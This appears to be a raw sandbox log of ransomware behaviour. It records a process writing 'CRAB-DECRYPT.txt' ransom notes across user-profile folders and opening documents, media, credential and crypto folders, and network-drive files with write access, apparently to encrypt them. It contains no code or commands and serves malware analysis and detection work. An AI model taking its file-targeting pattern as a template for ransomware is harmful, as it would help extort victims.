Create C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\settings.ini desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\AppData\Local\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create Z:\QbYwYSoMD3beKw.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\AppData\Roaming\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Cookies\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Desktop\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Documents\My Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Documents\My Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Documents\My Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Downloads\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Favorites\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Links\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\My Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\NetHood\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\NTUSER.DAT.LOG1 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\NTUSER.DAT.LOG2 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\PrintHood\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Recent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Saved Games\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\SendTo\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Start Menu\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Templates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default User\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\27YjI_tg_wmDvK-.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\2KxNzGrrl.doc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\fUHonlL.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\57VfXi.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\7y338WW30Khw_Kvdj.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\80nauBl1bcqQ.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\9HQb6.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\aD456ynae.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Collab\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Forms\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create Z:\brgVKnP3IVGPPX.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\JSCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\AssetCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\AssetCache\EYGUEQKQ\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\NativeCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Headlights\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Linguistics\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_Acrobat12_Reader_3980e2e3-09b5-4737-a657-22675b06a39a_03db394c-1477-45d1-895c-00e42db7e723_0.rdy desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\PCEJlbmpwZ68QNsWdvWo.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\zP0nKisr4oLuznV8Y.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\BC4CK.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Cx 2hVTJNEPKc.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\d 3OIHehyy3Jgx.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Dz28gHwyj9-jVurMnBQV.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\fezrNJYET8dXBnLxa.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\FKoQ.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\gfLne6ecA1jmfG6m8.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Im-Xi-TXJUjXU8gwjeAN.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\DR2HdhXM7A.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\iVmnctwjmS.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\je8O8Wzi8buOk7-5Nx6.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\KdoskM.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\P7UB2489\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create Z:\0uoW8iDiO9C0q.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\AddIns\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\ctwtFUQdhyq9B0.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\wwWTiMqjx6hY7AqmcQRC.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\ZluEZ8VfU.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Credentials\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Crypto\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Crypto\RSA\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2172869166-1497266965-2109836178-1000\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create Z:\AeKHMJrNCDYUq.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\usc0a0c3QarsfV.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Excel\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Excel\XLSTART\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\InputMethod\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\InputMethod\Chs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create Z:\Ft1MOn1CIc.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create Z:\1taL0c72JXkGj.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\UserData\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\MMC\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Network\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Network\Connections\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
